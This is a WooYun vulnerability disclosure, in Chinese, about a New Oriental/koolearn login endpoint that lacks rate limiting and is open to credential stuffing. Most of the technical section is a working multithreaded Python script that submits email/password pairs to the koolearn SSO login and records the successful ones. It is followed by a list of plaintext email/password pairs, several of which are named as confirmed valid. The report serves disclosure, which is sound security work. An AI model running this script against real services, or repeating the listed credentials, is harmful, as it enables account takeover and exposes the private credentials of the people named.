当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0110964

漏洞标题:新东方某登陆处设计缺陷可撞库

相关厂商:新东方

漏洞作者: jaffer

提交时间:2015-04-29 20:38

修复时间:2015-06-14 17:28

公开时间:2015-06-14 17:28

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-29: 细节已通知厂商并且等待厂商处理中
2015-04-30: 厂商已经确认,细节仅向厂商公开
2015-05-10: 细节向核心白帽子及相关领域专家公开
2015-05-20: 细节向普通白帽子公开
2015-05-30: 细节向实习白帽子公开
2015-06-14: 细节向公众公开

简要描述:

rt

详细说明:

地址:

http://115.182.44.211/index.php/site/login


使用koolearn账号体系登录的。虽然是教师登录,但是如果是正确的用户,会返回success。并且该登录没有做任何限制。
一个简单的python脚本。email里面是邮箱与密码的组合

#!/usr/bin/env python
#-*-coding:utf-8-*-
import httplib2
import urllib2
import urllib
import socket
from urllib import urlopen
from string import replace,find,lower
from httplib import HTTPException
import time
import threadpool
import threading
mutex = threading.Lock()
class fuzz(object):
	def __init__(self,user_pwd,count):
		self.user_pwd = user_pwd
		self.good = []
		self.count = count
		self.threadnum = 10
	def makePackage(self,euser,epwd):
		url = 'http://login.koolearn.com/sso/login.do?userName='+euser+'&password='+epwd+'&channel=wangqian&responseType=json&type=jsonp&callback=jQuery18204328589937649667_1430216268449&_=1430226430181'
		print url
		print euser
		print epwd
		headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36'}
		try:
			h = httplib2.Http()
			res,con = h.request(url,'GET',headers = headers)
			print con
		except:
			pass
		i = con.find('error')
		t = []
		if i == -1:
			if mutex.acquire():
				self.good.append([euser,epwd])			
				mutex.release()
		else:
			pass
	
	def preS(self):
		base = 0
		for each in self.user_pwd:
			self.makePackage(each[0],each[1][0:-1])
			if mutex.acquire():
				if len(self.good) != base:
					self.save()
					base = len(self.good)	
				mutex.release()
	
	def save(self):
		fp = open('result','w')
		for each in self.good:
			fp.writelines(each[0]+' '+each[1]+'\n')
		fp.close()
	
	def gothread(self):
		#建立进程池
		pool = threadpool.ThreadPool(self.threadnum)
		#两个list合并,直接相加就可以
		count = 0
		base = 0
		for i in range(self.count):
			print self.user_pwd[i][0]+'----user-----\n' + self.user_pwd[i][1] + '---pass---\n'
			if mutex.acquire():
				if len(self.good) != base:
					self.save()
					print 'OK\n'
					base = len(self.good)	
				mutex.release()
			pool.add_task(self.makePackage,self.user_pwd[i][0],self.user_pwd[i][1])
		#join and destroy all threads
		pool.destroy()
	
if __name__=='__main__':
	f = open('email','r')
	up = []
	count = 0
	while True:
		line = f.readline()
		if line:
			i = line.find(' ')
			user = line[0:i]
			pwd = line[i+1:]
			up.append([user,pwd])
			count = count + 1
		else:
			break
	f.close()
	test = fuzz(up,count)
	test.preS()


撞库:

cocoa@263.net fantacy2
jassonz@21cn.com caijun
shunvlh@263.net lh1112
lxhit@21cn.com 781120
billhao@hotmail.com 888999
XuZuotao@263.net.cn 751027
Chinamofee@sohu.com  6y1x3ca
flyfly@21cn.com flying123
childman@163.com chudird
wudw@263.net 556575
dimpleok@hotmail.com jasmine8
jouzen@163.net zhugh
TtiGeR@cableplus.com.cn sysop123
lxy@yytvu .net 58328
linwx1978@sohu.com iamjohns
with2000@21cn.com hello
fair_zhj@163.net 0531fair
liguodong@263.net lgd73
.......


漏洞证明:

cocoa@263.net fantacy2

1.png


jassonz@21cn.com caijun

2.jpg


billhao@hotmail.com 888999

3.png


with2000@21cn.com hello

45.png

修复方案:

防撞库

版权声明:转载请注明来源 jaffer@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-04-30 17:26

厂商回复:

感谢支持新东方安全,谢谢。

最新状态:

暂无